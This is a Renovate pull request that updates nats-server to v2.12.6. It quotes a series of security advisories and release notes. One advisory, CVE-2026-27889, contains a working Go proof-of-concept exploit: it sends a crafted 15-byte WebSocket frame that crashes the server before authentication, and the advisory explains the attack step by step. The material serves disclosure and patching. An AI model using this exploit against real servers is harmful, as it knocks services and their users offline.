Skip to content

fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security]#573

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability
Open

fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security]#573
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Feb 24, 2026
edited
Loading

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
github.com/nats-io/nats-server/v2 v2.12.1v2.12.6 age confidence

nats-server websockets are vulnerable to pre-auth memory DoS

CVE-2026-27571 / GHSA-qrvq-68c2-7grw

More information

Details

Impact

The WebSockets handling of NATS messages handles compressed messages via the WebSockets negotiated compression. The implementation bound the memory size of a NATS message but did not independently bound the memory consumption of the memory stream when constructing a NATS message which might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bounds the decompression to fail once the message was too large, instead of continuing on.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been, this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS: Message tracing can be redirected to arbitrary subject

CVE-2026-33249 / GHSA-8m2x-3m6q-6w8j

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server supports telemetry on messages, using the per-message NATS headers.

Problem Description

A valid client which uses message tracing headers can indicate that the trace messages can be sent to an arbitrary valid subject, including those to which the client does not have publish permission.

The payload is a valid trace message and not chosen by the attacker.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 4.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS credentials are exposed in monitoring port via command-line argv

CVE-2026-33247 / GHSA-x6g4-f6q3-fqvv

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an optional monitoring port, which provides access to sensitive data. The nats-server can take certain configuration options on the command-line instead of requiring a configuration file.

Problem Description

If a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled.

The /debug/vars end-point contains an unredacted copy of argv.

Patches

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

The NATS Maintainers are bemused at the concept of someone deploying a real configuration using --pass to avoid a config file, but also enabling monitoring.

Configure credentials inside a configuration file instead of via argv.

Do not enable the monitoring port if using secrets in argv.

Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

Severity

  • CVSS Score: 7.4 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS Server panic via malicious compression on leafnode port

CVE-2026-29785 / GHSA-52jh-2xxh-pwh6

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When configured to accept leafnode connections (for a hub/spoke topology of multiple nats-servers), then the default configuration allows for negotiating compression; a malicious remote NATS server can trigger a server panic via that compression.

Problem Description

If the nats-server has the "leafnode" configuration enabled (not default), then anyone who can connect can crash the nats-server by triggering a panic. This happens pre-authentication and requires that compression be enabled (which it is, by default, when leafnodes are used).

Context: a NATS server can form various clustering topologies, including local clusters, and superclusters of clusters, but leafnodes allow for separate administrative domains to link together with limited data communication; eg, a server in a moving vehicle might use a local leafnode for agents to connect to, and sync up to a central service as and when available. The leafnode configuration here is where the central server allows other NATS servers to connect into it, almost like regular NATS clients. Documentation examples typically use port 7422 for leafnode communications.

Affected Versions

Version 2, prior to v2.11.14 or v2.12.5

Workarounds

Disable compression on the leafnode port:

leafnodes {
  port: 7422
  compression: off
}

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS is vulnerable to MQTT hijacking via Client ID

CVE-2026-33215 / GHSA-fcjp-h8cc-6879

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

Sessions and Messages can by hijacked via MQTT Client ID malfeasance.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Resources

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has MQTT plaintext password disclosure

CVE-2026-33216 / GHSA-v722-jcv5-w7mc

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

For MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Ensure monitoring end-points are adequately secured.

Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

Severity

  • CVSS Score: 8.6 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS allows MQTT clients to bypass ACL checks

CVE-2026-33217 / GHSA-jxxm-27vp-c3m5

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

When using ACLs on message subjects, these ACLs were not applied in the $MQTT.> namespace, allowing MQTT clients to bypass ACL checks for MQTT subjects.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has pre-auth server panic via leafnode handling

CVE-2026-33218 / GHSA-vprv-35vv-q339

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers.

Problem Description

A client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds
  1. Disable leafnode support if not needed.
  2. Restrict network connections to your leafnode port, if plausible without compromising the service offered.
References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS is vulnerable to pre-auth DoS through WebSockets client service

CVE-2026-33219 / GHSA-8r68-gvr4-jh7j

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a WebSockets client service, used in deployments where browsers are the NATS clients.

Problem Description

A malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data.

This is a milder variant of NATS-advisory-ID 2026-02 (aka CVE-2026-27571; GHSA-qrvq-68c2-7grw).
That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Disable websockets if not required for project deployment.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS JetStream has an authorization bypass through its Management API

CVE-2026-33222 / GHSA-9983-vrx2-fg9c

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The persistent storage feature, JetStream, has a management API which has many features, amongst which are backup and restore.

Problem Description

Users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

If developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

Severity

  • CVSS Score: 4.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS Server: Incomplete Stripping of Nats-Request-Info Header Allows Identity Spoofing

CVE-2026-33223 / GHSA-pwx7-fx9r-hr4h

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a Nats-Request-Info: message header, providing information about a request.

Problem Description

The NATS message header Nats-Request-Info: is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective.

An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS: Leafnode connections allow spoofing of Nats-Request-Info identity headers

CVE-2026-33246 / GHSA-55h8-8g96-x4hj

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers. NATS messages can have headers.

Problem Description

The nats-server offers a Nats-Request-Info: message header, providing information about a request. This is supposed to provide enough information to allow for account/user identification, such that NATS clients could make their own decisions on how to trust a message, provided that they trust the nats-server as a broker.

A leafnode connecting to a nats-server is not fully trusted unless the system account is bridged too. Thus identity claims should not have propagated unchecked.

Thus NATS clients relying upon the Nats-Request-Info: header could be spoofed.

Does not directly affect the nats-server itself, but the CVSS Confidentiality and Integrity scores are based upon what a hypothetical client might choose to do with this NATS header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has mTLS verify_and_map authentication bypass via incorrect Subject DN matching

CVE-2026-33248 / GHSA-3f24-pcvm-5jqc

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

One authentication model supported is mTLS, deriving the NATS client identity from properties of the TLS Client Certificate.

Problem Description

When using mTLS for client identity, with verify_and_map to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass.

This does require a valid certificate from a CA already trusted for client certificates, and DN naming patterns which the NATS maintainers consider highly unlikely.

So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their DN construction patterns might conceivably be impacted.

Affected Versions

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

Developers should review their CA issuing practices.

Severity

  • CVSS Score: 4.2 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS: Pre-auth remote server crash via WebSocket frame length overflow in wsRead

CVE-2026-27889 / GHSA-pq2q-rcw4-3hr6

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When using WebSockets, a malicious client can trigger a server crash with crafted frames, before authentication.

Problem Description

A missing sanity check on a WebSockets frame could trigger a server panic in the nats-server. This happens before authentication, and so is exposed to anyone who can connect to the websockets port.

Affected versions

Version 2 from v2.2.0 onwards, prior to v2.11.14 or v2.12.5

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points. If able to do so, a defense in depth of restricting either of these will mitigate the attack.

Solution

Upgrade the NATS server to a fixed version.

Credits

This was reported to the NATS maintainers by GitHub user Mistz1.
Also independently reported by GitHub user jiayuqi7813.

Report by @​Mistz1
Summary

An unauthenticated remote attacker can crash the entire nats-server process by sending a single malicious WebSocket frame (15 bytes after the HTTP upgrade handshake). The server fails to validate the RFC 6455 §5.2 requirement that the most significant bit of a 64-bit extended payload length must be zero. The resulting uint64int conversion produces a negative value, which bypasses the bounds clamp and triggers an unrecovered panic in the connection's goroutine — killing the entire server process and disconnecting all clients. This affects all platforms (64-bit and 32-bit).

Details

Vulnerable code: server/websocket.go line 278

r.rem = int(binary.BigEndian.Uint64(tmpBuf))

When a WebSocket frame uses the 64-bit extended payload length (length code 127), the server reads 8 bytes and casts the raw uint64 directly to int with no validation. RFC 6455 §5.2 states: "the most significant bit MUST be 0" — but nats-server never checks this.

Attack chain:

  1. The attacker sends a WebSocket frame with the MSB set in the 64-bit length field (e.g., 0x8000000000000001).

  2. At line 278, int(0x8000000000000001) produces -9223372036854775807 on 64-bit Go (two's complement reinterpretation — Go does not panic on integer conversion overflow).

  3. r.rem is now negative. At line 307–311, the bounds clamp fails:

    n = r.rem                    // n = -9223372036854775807
if pos+n > max {             // 14 + (-huge) = negative, NOT > max → FALSE
    n = max - pos            // clamp NEVER fires
}
b = buf[pos : pos+n]         // buf[14 : -9223372036854775793] → PANIC

    The addition pos + n wraps to a negative value (Go signed integer overflow is defined behavior — it wraps silently). Since the negative result is never greater than max, the clamp is skipped. The slice expression at line 311 reaches the Go runtime bounds check, which panics.

  4. There is no defer recover() anywhere in the goroutine chain:

    The unrecovered panic propagates to Go's runtime, which calls os.Exit(2). The entire nats-server process terminates.

  5. The WebSocket frame is parsed in wsRead() called from readLoop(), which starts immediately after the HTTP upgrade — before any NATS CONNECT authentication. No credentials are required.

Why 15 bytes, not 14: The 14-byte frame header (opcode + length + mask key) exactly fills the read buffer on the first call, so pos == max and the payload loop at line 303 (if pos < max) is skipped. The poisoned r.rem persists in the wsReadInfo struct. One additional byte of "payload" is needed so that pos < max on either the same or next read, entering the panic path at line 311.

PoC

Server configuration (test-ws.conf):

listen: 127.0.0.1:4222

websocket {
    listen: "127.0.0.1:9222"
    no_tls: true
}

Start the server:

nats-server -c test-ws.conf

Exploit (poc_ws_crash.go):

package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "127.0.0.1:9222"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Printf("[*] Connecting to %s...\n", target)
	conn, err := net.DialTimeout("tcp", target, 5*time.Second)
	if err != nil {
		fmt.Printf("[-] Connection failed: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	// WebSocket upgrade
	req, _ := http.NewRequest("GET", "http://"+target, nil)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	req.Header.Set("Sec-WebSocket-Key", "dGhlIHNhbXBsZSBub25jZQ==")
	req.Header.Set("Sec-WebSocket-Version", "13")
	req.Header.Set("Sec-WebSocket-Protocol", "nats")
	req.Write(conn)

	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	resp, err := http.ReadResponse(bufio.NewReader(conn), req)
	if err != nil || resp.StatusCode != 101 {
		fmt.Printf("[-] Upgrade failed\n")
		os.Exit(1)
	}
	fmt.Println("[+] WebSocket established")
	conn.SetReadDeadline(time.Time{})

	// Malicious frame: FIN+Binary, MASK+127, 8-byte length with MSB set, mask key, 1 payload byte
	frame := make([]byte, 15)
	frame[0] = 0x82                                             // FIN + Binary
	frame[1] = 0xFF                                             // MASK + 127 (64-bit length)
	binary.BigEndian.PutUint64(frame[2:10], 0x8000000000000001) // MSB set
	frame[10] = 0xDE                                            // Mask key
	frame[11] = 0xAD
	frame[12] = 0xBE
	frame[13] = 0xEF
	frame[14] = 0x41                                            // 1 payload byte

	fmt.Printf("[*] Sending: %x\n", frame)
	conn.Write(frame)

	time.Sleep(2 * time.Second)

	// Verify crash
	conn2, err := net.DialTimeout("tcp", target, 3*time.Second)
	if err != nil {
		fmt.Println("[!!!] SERVER IS DOWN — full process crash confirmed")
		os.Exit(0)
	}
	conn2.Close()
	fmt.Println("[-] Server still running")
}

Run:

go build -o poc_ws_crash poc_ws_crash.go
./poc_ws_crash

Observed server output before termination:

panic: runtime error: slice bounds out of range [:-9223372036854775793]

goroutine 13 [running]:
github.com/nats-io/nats-server/v2/server.(*client).wsRead(...)
        server/websocket.go:311 +0xa93
github.com/nats-io/nats-server/v2/server.(*client).readLoop(...)
        server/client.go:1434 +0x768
github.com/nats-io/nats-server/v2/server.(*Server).startGoRoutine.func1()
        server/server.go:4078 +0x32

Tested against: nats-server v2.14.0-dev (commit a69f51f), Go 1.25.7, linux/amd64.

Impact

Vulnerability type: Pre-authentication remote denial of service (full process crash).

Who is impacted: Any nats-server deployment with WebSocket listeners enabled (websocket { ... } in config), including MQTT-over-WebSocket. This is an increasingly common configuration for browser-based and IoT clients. The attacker needs only TCP access to the WebSocket port — no credentials, no valid NATS client, no TLS client certificate.

Severity: A single unauthenticated TCP connection sending 15 bytes crashes the entire server process. All connected clients (NATS, WebSocket, MQTT, cluster routes, gateways, leaf nodes) are immediately disconnected. JetStream in-flight acknowledgments are lost and Raft consensus is disrupted in clustered deployments. The attack is repeatable on every server restart.

Affected platforms: All — confirmed on 64-bit (linux/amd64); 32-bit platforms (linux/386, linux/arm) are also affected with additional frame-desync consequences.

( NATS retains the original external report below the cut, with exploit details.
This issue was also independently reported by GitHub user @​jiayuqi7813 before publication; they provided a Python exploit.)

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.12.6

Compare Source

Changelog

Refer to the 2.12 Upgrade Guide for backwards compatibility notes with 2.11.x.

Go Version
  • 1.25.8
Dependencies
CVEs
Improved

General

  • Non-WebSocket leafnode connections can now be proxied using HTTP CONNECT (#​7781)
  • The $SYS.REQ.USER.INFO response now includes the friendly nametag of the account and/or user if known (#​7973)

JetStream

  • The stream peer-remove command now accepts a peer ID as well as a server name (#​7952)

MQTT

  • Protocol compliance has been improved, including more error handling on invalid or malformed MQTT packets (#​7933)
Fixed

General

  • Client connections are no longer registered after an auth callout timeout (#​7932)
  • Improved handling of duplicate headers
  • A correctness bug when validating relative distinguished names has been fixed
  • Secrets are now redacted correctly in trace logging (#​7942)
  • The expvar endpoint on the monitoring port now correctly redacts secrets from the command line arguments
  • Trace headers are no longer incorrectly parsed when hitting max payload (#​7954)
  • When running as a Windows service, switching to lame duck mode should now correctly exit the process (#​7958)
  • The configuration digest no longer removes from the used variable tracking, which could cause configuration fields to disappear from the returned config (#​7959)
  • A bug which could result in the service import cycle detection failing to detect a genuine cycle has been fixed (#​7961)
  • The PROXY protocol v1 header parser no longer incorrectly discards some early protocol bytes from the client (#​7962)
  • The Nats-Trace-Dest message header for message tracing now requires that the client have publish permissions to the specified subject, an error is returned otherwise
  • The route pool is now correctly populated if receiving a pong before handling the new route setup (#​7971)

Leafnodes

  • A panic when receiving a loop detection error before a connect message has been fixed
  • Messages from leafnodes to non-shared service imports now correctly rebuild the request info header
  • Leafnodes will now back off on receiving a minimum version required error, no longer requiring blocking the readloop (#​7970)

JetStream

  • Stream updates on clustered setups with async snapshots enabled should no longer result in the loss of consumer assignments, fixing the regression introduced in 2.12.5 (#​7939)
  • Fixed idempotent stream create with sources (#​7928)
  • Fixed a bug where mirror goroutines could get stuck stalling the mirror indefinitely (#​7929)
  • A panic that could occur when attempting to scale down a stream with an in-flight stream create and consumer create has been fixed (#​7940)
  • A panic when paginating on various JetStream API endpoints has been fixed
  • An interior path traversal bug that could occur when purging JetStream accounts has been fixed
  • Meta snapshot apply errors are now surfaced correctly so that the cluster monitor does not advance the applied index (#​7944)
  • Fixed an issue where extremely large JetStream reservations could overflow and violate tier limits
  • Stream restores now ensure that the stream name in the restore subject matches that of the restored snapshot archive
  • Stream ingest now correctly strips a NATS status header if present, avoiding incorrect classification of sourced or mirrored messages as control traffic
  • The Raft layer now resets the vote correctly when switching to candidate state (#​7956)
  • The orphan consumer check no longer unexpectedly deletes direct consumers, which could affect sourcing and mirroring (#​7957)
  • The Raft layer no longer commits entries from previous terms by only allowing entries from our current term up to the commit (#​7955)
  • Stream restores are now processed directly from the wire without intermediate staging on the filesystem, improving the enforcement of limits and reservations on disk
  • Stream sourcing now works correctly when sourcing into a stream with the Discard New Per Subject discard policy (#​7896)

MQTT

  • A panic that could occur when processing invalid fixed32 or fixed64 fields has been fixed (#​7941)
  • Persisted MQTT sessions can no longer be restored by a non-matching client ID
  • Restrict the implicit permissions for MQTT clients to $MQTT.sub. and $MQTT.deliver.pubrel. prefixes
  • MQTT password are no longer exposed in the JWT field of monitoring endpoints or advisory messages
  • NATS special characters (., >, *, spaces, tabs) are no longer permitted in MQTT client IDs
  • MQTT session flapping detection now uses monotonic time, fixing cases where it could be sensitive to NTP adjustments or clock drifts

WebSockets

  • WebSocket protocol parsing no longer relies on potentially unbounded in-memory allocations from compressed or uncompressed frames
Complete Changes

v2.12.5

Compare Source

Changelog

Refer to the 2.12 Upgrade Guide for backwards compatibility notes with 2.11.x.

[!WARNING]
A regression has been found in this version where a stream update may result in the loss of consumers in clustered deployments in specific cases. Single-server deployments are not affected. To temporarily mitigate, set meta_compact_sync: true in the jetstream config block and perform a configuration reload. We will soon follow up with a fixed 2.12.6 release.

Go Version
  • 1.25.8
Dependencies
  • github.com/nats-io/nkeys v0.4.15 (#​7797)
  • github.com/klauspost/compress v1.18.4 (#​7812)
  • golang.org/x/sys v0.42.0 (#​7923)
  • github.com/antithesishq/antithesis-sdk-go v0.6.0-default-no-op (#​7835)
  • golang.org/x/crypto v0.48.0 (#​7874)
  • github.com/nats-io/nats.go v1.49.0 (#​7835)
  • golang.org/x/time v0.15.0 (#​7923)
CVEs
Added

JetStream

  • The stream snapshot/backup endpoint now accepts the window_size parameter, to allow improving flow control over slow or unreliable connections (#​7839)
Improved

General

  • max_conns in the server configuration can now be configured to 0 (zero) to reject all incoming client connections (#​7877)

JetStream

  • "Catchup for stream" log lines are now more consistent (#​7784)
  • Raft now only accepts forwarded proposals if caught up as the new leader, limiting potentially unbounded log growth (#​7809)
  • Raft now correctly refuses concurrent membership changes if forwarded a peer removal from another node (#​7809)
  • The max_consumers limit of a stream can now be updated after stream creation (#​7724)
  • The pending messages and bytes are now included in consumer unpin responses (#​7815)
  • Stream backups/snapshots are now streamed to clients with improved flow control, which should improve throughput and robustness, particularly over unreliable links, reducing the chance of backups failing due to flow control errors (#​7828)
  • Orphaned stream and consumer checks are now aligned with the metalayer snapshot logic (#​7826)
  • Wildcard filtering when loading messages is now considerably faster in the memory store (#​7840, #​7855)
  • Metalayer snapshots now take place asynchronously when possible, such that JS API operations are not blocked while the snapshot is taking place (#​7827, #​7846)
    • This behaviour can be disabled by setting meta_compact_sync: true in the jetstream configuration block
  • Consumers with a single subject filter no longer incorrectly use the multi-filter message lookups (#​7856)
  • The check for colliding stream subjects is now faster (#​7870)
  • Raft replica lag and current values in stream info, consumer info and /jsz are now more consistent, no longer reporting incorrect values on follower nodes (#​7885)
  • Num pending calculations for R1 consumers now happen asynchronously and should no longer block the metalayer (#​7889)
Fixed

General

  • Routed message arguments no longer escape to the heap, improving performance (#​7867)
  • Malformed functions or operations in user permissions templates or on invalid template expansion during auth should no longer result in a server panic

Leafnodes

  • A crash when leafnodes with bad credentials performs an auth callout has been fixed (#​7844)
  • Receiving a leafnode subscription before negotiating compression should no longer result in a server panic

JetStream

  • A filestore bug which could hold onto a lock when exiting after an error has been fixed (#​7780)
  • The filestore now always uses tombstones for recovering trailing deletes (#​7782)
  • Fixed a race condition when rebuilding block state during recovery (#​7783)
  • The filestore binary search for a message block now correctly sorts blocks that contain only tombstones (#​7787)
  • Fixed a data race for streams when acquiring the deduplication sequence (#​7789)
  • Raft now correctly checks the closed state when reporting if the node is current (#​7793)
  • Raft now sets the election timeout instead of the campaign timeout when leaving observer mode (#​7793)
  • The metalayer now tracks in-flight meta changes for invalid stream or consumer updates (#​7798)
  • The metalayer no longer incorrectly overwrites local consumer assignments before they are applied, which would result in them being omitted from the meta snapshot (#​7798)
  • The inactive threshold clean-up no longer leave lingering goroutines (#​7799)
  • Pooled publish message underlying buffer capacity is now reused correctly (#​7790)
  • Consumers with overlapping filter subjects where one is not a subset of the other are now allowed (#​7810)
  • The filestore now checksums after truncation on compressed or encrypted stores (#​7816)
  • The filestore no longer leaks locks in various error states (#​7816)
  • The filestore now correctly holds the lock during snapshotting on encrypted stores (#​7816)
  • The filestore now ensures that num pending calculations cannot overflow (#​7816)
  • The filestore now correctly recalculates the subject state as needed when finding last sequences (#​7816)
  • The filestore now sorts configured subjects when checking whether filters represent all of the configured filters (#​7816)
  • The filestore now avoids subject and header corruption in more cases (#​7816)
  • Consumer unpinning is now handled correctly when stepping down (#​7819)
  • Consumer unpinning now allows the next client to pick up the next pin without waiting for new messages (#​7819)
  • Fixed a race condition when remapping the underlying group of a replicated asset (#​7820, #​7883)
  • An overflowed pull request when min pending or min ack pending is above the threshold is now handled correctly (#​7795)
  • Timers are no longer leaked when failing to set up mirrors, which resulted in high CPU usage (#​7825)
  • Monitor quit channels are created on demand, fixing cases where an asset restarts with a different underlying Raft group (#​7837)
  • Recovered streams and consumers are now correctly handled when not present in a metalayer catchup snapshot (#​7824)
  • Ensure that messages that have reached the max deliver state are preserved with the WorkQueue retention policy (#​7845)
  • An inconsistency with consumer naming between the current and legacy consumer create endpoints has been fixed (#​7848)
  • The Raft layer no longer incorrectly reverts the last snapshot applied sequence when truncating uncommitted entries after a catchup snapshot (#​7849)
  • The Raft layer no longer incorrectly restores the cluster size to 1 at startup, which could result in an isolated node incorrectly winning a single-node election (#​7850)
  • The memory store correctly refreshes the last sequence of a subject in the subject state tracking (#​7865)
  • Tiered reservations are now handled more consistently, fixing issues where replicated assets could be over-counted and where reservations were incorrectly applied on recovery (#​7880)
  • When scaling down a replicated consumer to R1, the correct consumer name is now used in the request where no durable name is set (#​7891)
  • Consumer deletion will now retry correctly when erroring with a directory not empty error (#​7886)
  • The store_max_stream_bytes and memory_max_stream_bytes are no longer incorrectly applied when determining whether account resource limits have been exc

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot requested a review from a team as a code owner February 24, 2026 17:07
@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Feb 24, 2026
@renovate renovate Bot requested review from a team as code owners February 24, 2026 17:07
@renovate renovate Bot enabled auto-merge February 24, 2026 17:07
@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Feb 24, 2026
edited
Loading

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 15 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.24.3 -> 1.25.0
github.com/nats-io/nats.go v1.47.0 -> v1.49.0
github.com/antithesishq/antithesis-sdk-go v0.4.3-default-no-op -> v0.6.0-default-no-op
github.com/google/go-tpm v0.9.6 -> v0.9.8
github.com/klauspost/compress v1.18.0 -> v1.18.4
github.com/minio/highwayhash v1.0.3 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.8.0 -> v2.8.1
github.com/nats-io/nkeys v0.4.11 -> v0.4.15
golang.org/x/mod v0.28.0 -> v0.33.0
golang.org/x/sync v0.17.0 -> v0.20.0
golang.org/x/time v0.14.0 -> v0.15.0
golang.org/x/tools v0.37.0 -> v0.42.0
golang.org/x/crypto v0.43.0 -> v0.49.0
golang.org/x/net v0.46.0 -> v0.51.0
golang.org/x/sys v0.37.0 -> v0.42.0
golang.org/x/text v0.30.0 -> v0.35.0

mergify[bot]
mergify Bot previously approved these changes Feb 24, 2026
View reviewed changes
@renovate renovate Bot dismissed stale reviews from infratographer-robot and mergify[bot] via 09fe8a5 March 24, 2026 20:42
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 200aa09 to 09fe8a5 Compare March 24, 2026 20:42
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.3 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Mar 24, 2026
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed Mar 27, 2026
